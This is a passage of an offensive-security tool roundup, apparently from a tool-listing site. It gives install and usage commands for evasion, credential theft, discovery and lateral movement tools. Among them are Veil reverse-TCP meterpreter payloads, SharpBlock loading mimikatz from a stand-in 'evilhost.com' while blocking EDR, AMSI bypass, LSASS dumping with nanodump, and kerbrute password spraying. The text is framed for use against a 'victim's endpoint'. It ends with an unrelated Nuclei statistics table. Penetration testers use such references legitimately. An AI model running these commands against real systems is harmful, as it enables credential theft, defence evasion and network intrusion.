  • ADFSDump assumes that the service is configured to use the Windows Internal Database (WID). Although it would be trivial to support an external SQL server, this feature does not exist right now.
  • ADFSDump must be run locally on an AD FS server, NOT an AD FS web application proxy. The WID can only be accessed locally via a named pipe.

Install: (Compile)

ADFSDump was built against .NET 4.5 with Visual Studio 2017 Community Edition. Simply open up the project .sln, choose "Release", and build.

Usage: (Flags)

root@kitploit:~
# The Active Directory domain to target. Defaults to the current domain.
/domain:

# The Domain Controller to target. Defaults to the current DC.
/server:

# Switch. Toggle to disable outputting the DKM key.
/nokey

# (optional) SQL connection string if ADFS is using remote MS SQL rather than WID.
/database

Blog - Exploring the Golden SAML Attack Against ADFS

image

Image used from https://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs

Defense Evasion

🔙Invoke-Obfuscation

A PowerShell v2.0+ compatible PowerShell command and script obfuscator. If a victim endpoint is able to execute PowerShell then this tool is great for creating heavily obfuscated scripts.

Install:

root@kitploit:~
git clone https://github.com/danielbohannon/Invoke-Obfuscation.git

Usage:

root@kitploit:~
./Invoke-Obfuscation

image

🔙Veil

Veil is a tool for generating metasploit payloads that bypass common anti-virus solutions.

It can be used to generate obfuscated shellcode, see the official veil framework blog for more info.

Install: (Kali)

root@kitploit:~
apt -y install veil
/usr/share/veil/config/setup.sh --force --silent

Install: (Git)

root@kitploit:~
sudo apt-get -y install git
git clone https://github.com/Veil-Framework/Veil.git
cd Veil/
./config/setup.sh --force --silent

Usage:

root@kitploit:~
# List all payloads (–list-payloads) for the tool Ordnance (-t Ordnance)
./Veil.py -t Ordnance --list-payloads

# List all encoders (–list-encoders) for the tool Ordnance (-t Ordnance)
./Veil.py -t Ordnance --list-encoders

# Generate a reverse tcp payload which connects back to the ip 192.168.1.20 on port 1234
./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 192.168.1.20 --port 1234

# List all payloads (–list-payloads) for the tool Evasion (-t Evasion)
./Veil.py -t Evasion --list-payloads

# Generate shellcode using Evasion, payload number 41, reverse_tcp to 192.168.1.4 on port 8676, output file chris
./Veil.py -t Evasion -p 41 --msfvenom windows/meterpreter/reverse_tcp --ip 192.168.1.4 --port 8676 -o chris

Veil creators wrote a nice blog post explaining further ordnance and evasion command line usage.

image

🔙SharpBlock

A method of bypassing EDR's active projection DLL's by preventing entry point execution.

Features:

  • Blocks EDR DLL entry point execution, which prevents EDR hooks from being placed.
  • Patchless AMSI bypass that is undetectable from scanners looking for Amsi.dll code patches at runtime.
  • Host process that is replaced with an implant PE that can be loaded from disk, HTTP or named pipe (Cobalt Strike).
  • Implanted process is hidden to help evade scanners looking for hollowed processes.
  • Command line args are spoofed and implanted after process creation using stealthy EDR detection method.
  • Patchless ETW bypass.
  • Blocks NtProtectVirtualMemory invocation when callee is within the range of a blocked DLL's address space.

Install:

Use Visual Studio 2019 Community Edition to compile the SharpBlock binary.

Open the SharpBlock project .sln, choose "Release", and build.

Usage:

root@kitploit:~
# Launch mimikatz over HTTP using notepad as the host process, blocking SylantStrike's DLL
SharpBlock -e http://evilhost.com/mimikatz.bin -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee

# Launch mimikatz using Cobalt Strike beacon over named pipe using notepad as the host process, blocking SylantStrike's DLL
execute-assembly SharpBlock.exe -e \\.\pipe\mimi -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee
upload_file /home/haxor/mimikatz.exe \\.\pipe\mimi

Nice PenTestPartners blog post here.

image

Image used from https://youtu.be/0W9wkamknfM

🔙Alcatraz

Alcatraz is a GUI x64 binary obfuscator that is able to obfuscate various different pe files including:

  • .exe
  • .dll
  • .sys

Some supported obfuscation features include:

  • Obfuscation of immediate moves
  • Control flow flattening
  • ADD mutation
  • Entry-point obfuscation
  • Lea obfuscation

Install: (Requirements)

Install: https://vcpkg.io/en/getting-started.html

root@kitploit:~
vcpkg.exe install asmjit:x64-windows
vcpkg.exe install zydis:x64-windows

Usage:

Using the GUI to obfuscate a binary:

  1. Load a binary by clicking file in the top left corner.
  2. Add functions by expanding the Functions tree. (You can search by putting in the name in the searchbar at the top)
  3. Hit compile (Note: Obfuscating lots of functions might take some seconds)

image

Image used from https://github.com/weak1337/Alcatraz

🔙Mangle

Mangle is a tool that manipulates aspects of compiled executables (.exe or DLL).

Mangle can remove known Indicators of Compromise (IoC) based strings and replace them with random characters, change the file by inflating the size to avoid EDRs, and can clone code-signing certs from legitimate files.

In doing so, Mangle helps loaders evade on-disk and in-memory scanners.

Install:

The first step, as always, is to clone the repo. Before you compile Mangle, you'll need to install the dependencies. To install them, run the following commands:

root@kitploit:~
go get github.com/Binject/debug/pe

Then build it

root@kitploit:~
git clone https://github.com/optiv/Mangle
cd Mangle
go build Mangle.go

Usage:

root@kitploit:~
  -C string
        Path to the file containing the certificate you want to clone
  -I string
        Path to the orginal file
  -M    Edit the PE file to strip out Go indicators
  -O string
        The new file name
  -S int
        How many MBs to increase the file by

Full usage information can be found here.

image

Image used from https://github.com/optiv/Mangle

🔙AMSI Fail

AMSI.fail is a great website that can be used to generate obfuscated PowerShell snippets that break or disable AMSI for the current process.

The snippets are randomly selected from a small pool of techniques/variations before being obfuscated. Every snippet is obfuscated at runtime/request so that no generated output share the same signatures.

Nice f-secure blog explaining AMSI here.

image

Image used from http://amsi.fail/

Credential Access

🔙Mimikatz

Great tool for gaining access to hashed and cleartext passwords on a victims endpoint. Once you have gained privileged access to a system, drop this tool to collect some creds.

Install:

  1. Download the mimikatz_trunk.7z file.
  2. Once downloaded, the mimikatz.exe binary is in the x64 folder.

Usage:

root@kitploit:~
.\mimikatz.exe
privilege::debug

image

🔙LaZagne

Nice tool for extracting locally stored passwords from browsers, databases, games, mail, git, wifi, etc.

Install: (Binary)

You can install the standalone binary from here.

Usage:

root@kitploit:~
# Launch all modes
.\laZagne.exe all

# Launch only a specific module
.\laZagne.exe browsers

# Launch only a specific software script
.\laZagne.exe browsers -firefox

image

🔙hashcat

Tool for cracking password hashes. Supports a large list of hashing algorithms (Full list can be found here).

Install: Binary

You can install the standalone binary from here.

Usage:

root@kitploit:~
.\hashcat.exe --help

Nice hashcat command cheatsheet.

image

🔙John the Ripper

Another password cracker, which supports hundreds of hash and cipher types, and runs on many operating systems, CPUs and GPUs.

Install:

root@kitploit:~
sudo apt-get install john -y

Usage:

root@kitploit:~
john

image

🔙SCOMDecrypt

This tool is designed to retrieve and decrypt RunAs credentials stored within Microsoft System Center Operations Manager (SCOM) databases.

NCC blog post - 'SCOMplicated? – Decrypting SCOM “RunAs” credentials'

Pre-requisites:

To run the tool you will require administrative privileges on the SCOM server. You will also need to ensure that you have read access to the following registry key:

root@kitploit:~
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\MOMBins

You can check manually that you can see the database by gathering the connection details from the following keys:

root@kitploit:~
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\Database\DatabaseServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\Database\DatabaseName

Install: (PS1)

root@kitploit:~
git clone https://github.com/nccgroup/SCOMDecrypt
cd .\SCOMDecrypt\SCOMDecrypt\
. .\Invoke-SCOMDecrypt.ps1

Install: (Compile)

Using Visual Studio 2019 Community Edition you can compile the SCOMDecrypt binary.

Open the SCOMDecrypt project .sln, choose "Release", and build.

Usage:

root@kitploit:~
# PS1
Invoke-SCOMDecrypt

# Compiled C# binary
.\SCOMDecrypt.exe

image

Image text used from https://github.com/nccgroup/SCOMDecrypt

🔙nanodump

The LSASS (Local Security Authority Subsystem Service) is a system process in the Windows operating system that is responsible for enforcing the security policy on the system. It is responsible for a number of tasks related to security, including authenticating users for logon, enforcing security policies, and generating audit logs.

Creating a dump of this process can allow an attacker to extract password hashes or other sensitive information from the process's memory, which could be used to compromise the system further.

This allows for the creation of a minidump of the LSASS process.

Install:

root@kitploit:~
git clone https://github.com/helpsystems/nanodump.git

Install: (Linux with MinGW)

root@kitploit:~
make -f Makefile.mingw

Install: (Windows with MSVC)

root@kitploit:~
nmake -f Makefile.msvc

Install: (CobaltStrike only)

Import the NanoDump.cna script on Cobalt Strike.

Full installation information can be found here.

Usage:

root@kitploit:~
# Run
nanodump.x64.exe

# Leverage the Silent Process Exit technique
nanodump --silent-process-exit C:\Windows\Temp\

# Leverage the Shtinkering technique
nanodump --shtinkering

Full usage information can be found here.

nanodump

Image used from https://github.com/helpsystems/nanodump

🔙eviltree

A standalone python3 remake of the classic "tree" command with the additional feature of searching for user provided keywords/regex in files, highlighting those that contain matches. Created for two main reasons:

  • While searching for secrets in files of nested directory structures, being able to visualize which files contain user provided keywords/regex patterns and where those files are located in the hierarchy of folders, provides a significant advantage.
  • tree is an amazing tool for analyzing directory structures. It's really handy to have a standalone alternative of the command for post-exploitation enumeration as it is not pre-installed on every linux distro and is kind of limited on Windows (compared to the UNIX version).

Install:

root@kitploit:~
git clone https://github.com/t3l3machus/eviltree

Usage:

root@kitploit:~
# Running a regex that essentially matches strings similar to: password = something against /var/www
python3 eviltree.py -r /var/www -x ".{0,3}passw.{0,3}[=]{1}.{0,18}" -v

# Using comma separated keywords instead of regex
python3 eviltree.py -r C:\Users\USERNAME -k passw,admin,account,login,user -L 3 -v

image

Image used from https://github.com/t3l3machus/eviltree

🔙SeeYouCM-Thief

Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials.

Will also optionally enumerate active directory users from the UDS API.

Blog - Exploiting common misconfigurations in cisco phone systems

Install:

root@kitploit:~
git clone https://github.com/trustedsec/SeeYouCM-Thief
python3 -m pip install -r requirements.txt

Usage:

root@kitploit:~
# Enumerate Active Directory users from the UDS api on the CUCM
./thief.py -H <CUCM server> --userenum

# Without specifying a phone IP address the script will attempt to download every config in the listing.
./thief.py -H <Cisco CUCM Server> [--verbose]

# Parse the web interface for the CUCM address and will do a reverse lookup for other phones in the same subnet.
./thief.py --phone <Cisco IP Phoner> [--verbose]

# Specify a subnet to scan with reverse lookups.
./thief.py --subnet <subnet to scan> [--verbose]

image

Image used from https://www.trustedsec.com/blog/seeyoucm-thief-exploiting-common-misconfigurations-in-cisco-phone-systems/

🔙MailSniper

MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used as a non-administrative user to search their own email or by an Exchange administrator to search the mailboxes of every user in a domain.

MailSniper also includes additional modules for password spraying, enumerating users and domains, gathering the Global Address List (GAL) from OWA and EWS and checking mailbox permissions for every Exchange user at an organization.

Nice blog post with more information about here.

MailSniper Field Manual

Install:

root@kitploit:~
git clone https://github.com/dafthack/MailSniper
cd MailSniper
Import-Module MailSniper.ps1

Usage:

root@kitploit:~
# Search current users mailbox
Invoke-SelfSearch -Mailbox [email protected]

image

Image used from https://patrowl.io/

Discovery

🔙PCredz

This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.

Install:

root@kitploit:~
git clone https://github.com/lgandx/PCredz

Usage: (PCAP File Folder)

root@kitploit:~
python3 ./Pcredz -d /tmp/pcap-directory-to-parse/

Usage: (Live Capture)

root@kitploit:~
python3 ./Pcredz -i eth0 -v

image

🔙PingCastle

Ping Castle is a tool designed to assess quickly the Active Directory security level with a methodology based on risk assessment and a maturity framework. It does not aim at a perfect evaluation but rather as an efficiency compromise.

Install: (Download)

root@kitploit:~
https://github.com/vletoux/pingcastle/releases/download/2.11.0.1/PingCastle_2.11.0.1.zip

Usage:

root@kitploit:~
./PingCastle.exe

image

🔙Seatbelt

Seatbelt is a useful tool for gathering detailed information about the security posture of a target Windows machine in order to identify potential vulnerabilities and attack vectors.

It is designed to be run on a compromised victim machine to gather information about the current security configuration, including information about installed software, services, group policies, and other security-related settings

Install: (Compile)

Seatbelt has been built against .NET 3.5 and 4.0 with C# 8.0 features and is compatible with Visual Studio Community Edition.

Open up the project .sln, choose "release", and build.

Usage:

root@kitploit:~
# Run all checks and output to output.txt
Seatbelt.exe -group=all -full > output.txt

# Return 4624 logon events for the last 30 days
Seatbelt.exe "LogonEvents 30"

# Query the registry three levels deep, returning only keys/valueNames/values that match the regex .*defini.*
Seatbelt.exe "reg \"HKLM\SOFTWARE\Microsoft\Windows Defender\" 3 .*defini.* true"

# Run remote-focused checks against a remote system
Seatbelt.exe -group=remote -computername=192.168.230.209 -username=THESHIRE\sam -password="yum \"po-ta-toes\""

Full command groups and parameters can be found here.

image

Image used from https://exord66.github.io/csharp-in-memory-assemblies

🔙ADRecon

Great tool for gathering information about a victim's Microsoft Active Directory (AD) environment, with support for Excel outputs.

It can be run from any workstation that is connected to the environment, even hosts that are not domain members.

BlackHat USA 2018 SlideDeck

Prerequisites

  • .NET Framework 3.0 or later (Windows 7 includes 3.0)
  • PowerShell 2.0 or later (Windows 7 includes 2.0)

Install: (Git)

root@kitploit:~
git clone https://github.com/sense-of-security/ADRecon.git

Install: (Download)

You can download a zip archive of the latest release.

Usage:

root@kitploit:~
# To run ADRecon on a domain member host.
PS C:\> .\ADRecon.ps1

# To run ADRecon on a domain member host as a different user.
PS C:\>.\ADRecon.ps1 -DomainController <IP or FQDN> -Credential <domain\username>

# To run ADRecon on a non-member host using LDAP.
PS C:\>.\ADRecon.ps1 -Protocol LDAP -DomainController <IP or FQDN> -Credential <domain\username>

# To run ADRecon with specific modules on a non-member host with RSAT. (Default OutputType is STDOUT with -Collect parameter)
PS C:\>.\ADRecon.ps1 -Protocol ADWS -DomainController <IP or FQDN> -Credential <domain\username> -Collect Domain, DomainControllers

Full usage and parameter information can be found here.

image

Image used from https://vk9-sec.com/domain-enumeration-powerview-adrecon/

🔙adidnsdump

By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones, similar to a zone transfer.

This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.

Install: (Pip)

root@kitploit:~
pip install git+https://github.com/dirkjanm/adidnsdump#egg=adidnsdump

Install: (Git)

root@kitploit:~
git clone https://github.com/dirkjanm/adidnsdump
cd adidnsdump
pip install .

Note: The tool requires impacket and dnspython to function. While the tool works with both Python 2 and 3, Python 3 support requires you to install impacket from GitHub.

Usage:

root@kitploit:~
# Display the zones in the domain where you are currently in
adidnsdump -u icorp\\testuser --print-zones icorp-dc.internal.corp

# Display all zones in the domain
adidnsdump -u icorp\\testuser icorp-dc.internal.corp

# Resolve all unknown records (-r)
adidnsdump -u icorp\\testuser icorp-dc.internal.corp -r

Blog - Getting in the Zone: dumping Active Directory DNS using adidnsdump

adidnsdump

Image used from https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/

🔙kerbrute

A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication.

Install: (Go)

root@kitploit:~
go get github.com/ropnop/kerbrute

Install: (Make)

root@kitploit:~
git clone https://github.com/ropnop/kerbrute
cd kerbrute
make all

Usage:

root@kitploit:~
# User Enumeration
./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt

# Password Spray
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123

# Brute User
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com passwords.lst thoffman

# Brute Force
./kerbrute -d lab.ropnop.com bruteforce -

image

Image used from https://matthewomccorkle.github.io/day_032_kerbrute/

🔙scavenger

Scavenger is a multi-threaded post-exploitation scanning tool for scavenging systems, finding most frequently used files and folders as well as "interesting" files containing sensitive information.

Scavenger confronts a challenging issue typically faced by Penetration Testing consultants during internal penetration tests; the issue of having too much access to too many systems with limited days for testing.

Install:

First install CrackMapExec from here.

root@kitploit:~
git clone https://github.com/SpiderLabs/scavenger
cd scavenger

Usage:

root@kitploit:~
# Search for interesting files on victim endpoint
python3 ./scavenger.py smb -t 10.0.0.10 -u administrator -p Password123 -d test.local

Nice blog post.

image

Image used from https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/scavenger-post-exploitation-tool-for-collecting-vital-data/

Lateral Movement

🔙crackmapexec

This is a great tool for pivoting in a Windows/Active Directory environment using credential pairs (username:password, username:hash). It also offered other features including enumerating logged on users and spidering SMB shares to executing psexec style attacks, auto-injecting Mimikatz/Shellcode/DLL’s into memory using Powershell, dumping the NTDS.dit and more.

Install:

root@kitploit:~
sudo apt install crackmapexec

Usage:

root@kitploit:~
crackmapexec smb <ip address> -d <domain> -u <user list> -p <password list>

image

🔙WMIOps

WMIOps is a powershell script that uses WMI to perform a variety of actions on hosts, local or remote, within a Windows environment.

Developed by @christruncer.

Original blog post documenting release.

Install: (PowerShell)

root@kitploit:~
git clone https://github.com/FortyNorthSecurity/WMIOps
Import-Module WMIOps.ps1

Usage:

root@kitploit:~
# Executes a user specified command on the target machine
Invoke-ExecCommandWMI

# Returns all running processes from the target machine
Get-RunningProcessesWMI

# Checks if a user is active at the desktop on the target machine (or if away from their machine)
Find-ActiveUsersWMI

# Lists all local and network connected drives on target system
Get-SystemDrivesWMI

# Executes a powershell script in memory on the target host via WMI and returns the output
Invoke-RemoteScriptWithOutput

image

image

Images used from https://pentestlab.blog/2017/11/20/command-and-control-wmi/

🔙PowerLessShell

Tool that uses MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe.

Install:

root@kitploit:~
git clone https://github.com/Mr-Un1k0d3r/PowerLessShell
cd PowerLessShell

Usage:

root@kitploit:~
# Help
python PowerLessShell.py -h

# Generate PowerShell payload
python PowerLessShell.py -type powershell -source script.ps1 -output malicious.csproj

# Generating a shellcode payload
python PowerLessShell.py -source shellcode.raw -output malicious.csproj

Read more

Download Tool

Nuclei Templates Top 10 statistics

TAGCOUNTAUTHORCOUNTDIRECTORYCOUNTSEVERITYCOUNTTYPECOUNT
cve1855dhiyaneshdk835http5860info2857file123
panel896dwisiswant0794workflows190high1270dns18
wordpress781daffainfo664file123medium1042
exposure677pikpikcu353network93critical704
wp-plugin672pdteam278dns18low216
xss646pussycat0x240ssl12unknown26
osint639geeknik220headless9
tech602ricardomaia215TEMPLATES-STATS.json1
edb596ritikchaddha210contributors.json1
lfi5480x_akoko179cves.json1

404 directories, 6542 files.